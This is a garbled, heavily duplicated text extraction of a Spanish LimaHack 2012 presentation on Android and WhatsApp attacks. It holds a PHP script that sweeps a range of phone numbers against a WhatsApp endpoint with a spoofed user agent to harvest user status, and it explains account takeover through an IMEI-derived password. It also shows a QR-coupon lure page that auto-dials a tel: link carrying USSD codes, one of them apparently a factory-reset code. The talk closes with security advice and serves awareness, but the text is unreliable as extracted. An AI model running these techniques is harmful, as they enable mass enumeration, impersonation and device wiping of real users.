EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 24: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/24.jpg)
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 25: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/25.jpg)
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 26: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/26.jpg)
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 27: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/27.jpg)
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 28: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/28.jpg)
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 29: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/29.jpg)
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 30: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/30.jpg)
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
